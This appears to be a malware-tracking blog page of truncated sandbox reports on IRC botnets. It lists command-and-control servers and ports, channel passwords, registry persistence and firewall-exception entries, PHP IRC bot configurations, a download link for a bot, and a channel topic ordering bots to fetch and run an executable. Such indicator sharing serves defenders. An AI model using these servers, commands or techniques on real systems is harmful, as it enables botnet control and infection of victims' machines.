Author: Pig

mile.dbsarticles.com 205.234.222.37 * C&C Server: 205.234.222.37:2345 * Server Password: * Username: XP-0642 * Nickname: NEW-[DEU|00|P|85489] * Channel: #imb (Password: test) * Channeltopic: :.msn.stop|.msn.msg foto 😀 http://expensiveimages.com/image.php?= Registry Changes by all processes Create or Open Changes HKEY_LOCAL_MACHINESYSTEMControlSet001ServicesSharedAccessParametersFirewallPolicyStandardProfileAuthorizedApplicationsList “c:IM35616.JPGwww.myspace.com.exe” = c:IM35616.JPGwww.myspace.com.exe:*:Enabled:Firewall Administrating HKEY_LOCAL_MACHINESYSTEMControlSet001ServicesSharedAccessParametersFirewallPolicyStandardProfileAuthorizedApplicationsList “c:IM35616.JPGwww.myspace.com.exe” = C:WINDOWSinfocard.exe:*:Enabled:Firewall Administrating HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindowsCurrentVersionRun “Firewall Administrating” = C:WINDOWSinfocard.exe HKEY_CURRENT_USERSoftwareMicrosoftWindowsCurrentVersionRun “Firewall Administrating” = C:WINDOWSinfocard.exeRead more...

Remote Host Port Number 204.0.5.34 80 204.0.5.41 80 204.0.5.49 80 204.0.5.51 80 204.0.5.58 80 216.178.38.103 80 216.178.38.168 80 63.135.86.30 80 63.135.86.39 80 64.210.61.214 80 64.202.120.57 2345 ircd here * The data identified by the following URLs was then requested from the remote web server: o http://1.download.advertise.myspace.com/upld/cs/1//cs4_lb_1705_.jpg o http://1.download.advertise.myspace.com/upld/cs/1//cs3_sk_3469_.jpg o http://x.myspacecdn.com/modules/common/static/css/global_dbasuqgy.css o http://x.myspacecdn.com/modules/common/static/css/uploadcontrol_ioe1imsn.css o http://x.myspacecdn.com/modules/browse/static/css/browse_qzzglnfy.css oRead more...

Remote Host Port Number 85.12.60.20 81 NICK n[USA|XP]5266080 USER n “” “lol” :n JOIN #control# PONG 422 PONG :request.not.found Other details * The following port was open in the system: Port Protocol Process 1053 TCP winvsnc.exe (%AppData%winvsnc.exe) Registry Modifications * The newly created Registry Value is: o [HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindowsCurrentVersionRun] + WindowsUpdateControl = “%AppData%winvsnc.exe” so that winvsnc.exeRead more...

var $config = array(“server”=>”207.58.186.227”, “port”=>7000, “pass”=>””, //senha do server “prefix”=>”[B]”, “maxrand”=>4, “chan”=>”#crack”, “key”=>”tow”, //senha do canal “modes”=>”+p”, “password”=>”la”, //senha do bot “trigger”=>”.”, “hostauth”=>”*” // * for any hostname here u can download this php bot: http://stashbox.org/866727/stla.txt

ktodumal.net 85.12.60.20 C&C Server: 85.12.60.20:81 Server Password: Username: n Nickname: n[DEU|XP]0949985 Channel: #new# (Password: ) Channeltopic: :.im http://www.veyrandon-camions-magasins.fr/img/fotos.php?foto=IMG020407202010.JPG Now talking in #inf# Topic is ‘.dl http://veyrandon-camions-magasins.fr/admin/n.exe’ Set by s on Thu Apr 22 05:11:24 also chanel :#newgen# Registry Changes by all processes Create or Open Changes HKEY_LOCAL_MACHINESYSTEMControlSet001ServicesSharedAccessParametersFirewallPolicyStandardProfileAuthorizedApplicationsList “C:Dokumente und EinstellungenAdministratorAnwendungsdatenwinvsn.exe” = C:Dokumente und EinstellungenAdministratorAnwendungsdatenwinvsn.exe:*:Enabled:Windows ControlRead more...

server”=>”218.226.193.174″, “port”=>4242, “pass”=>””, // “prefix”=>””, “maxrand”=>7, “chan”=>”##xp#”, “key”=>”142536”, // “modes”=>”-x+i”, “password”=>”stop”, // “trigger”=>”!say@”, “hostauth”=>”*” // *

[ DetectionInfo ] * Filename: C:analyzerscansvcnost.exe. * Sandbox name: W32/Backdoor. * Signature name: Ircbot.BAYQ. * Compressed: NO. * TLS hooks: NO. * Executable type: Application. * Executable file structure: OK. * Filetype: PE_I386. [ General information ] * File length: 73728 bytes. * MD5 hash: a9bfb1db9d131e1bcce5b8f1f3132871. * SHA1 hash: e7e8d1ce421b418a31180beb25a3e758265ea9c7. * Entry-point detection: Microsoft VisualRead more...

Server irc.x2.al [Berisha)] Connecting to 88.84.190.62 (4243) Modded by MrAnToN e-mail mranton@hotmail.de -Anton@Berisha.info

Remote Host Port Number wmim.solutionofmsn.org 1234 NICK {NEW}[USA][XP-SP2]074959 USER 1231 “” “lol” :1231 JOIN #b# NICK [USA][XP-SP2]339973 USER 0146 “” “lol” :0146 Other details * To mark the presence in the system, the following Mutex object was created: o kOiJjfhjtgK * The following port was open in the system: Port Protocol Process 1036 TCP msnms.exeRead more...

Remote Host Port Number vunrestrained.dyndns.info 51987 NICK Unrestrained-331897 USER ercmoxzx 0 0 :Unrestrained-331897 USERHOST Unrestrained-331897 MODE Unrestrained-331897 -x+B JOIN #Hydra# NICK Unrestrained-231953 USER ixuzpou 0 0 :Unrestrained-231953 USERHOST Unrestrained-231953 MODE Unrestrained-231953 -x+B NICK Unrestrained-465848 USER adwosov 0 0 :Unrestrained-465848 USERHOST Unrestrained-465848 MODE Unrestrained-465848 -x+B Other details * To mark the presence in the system, theRead more...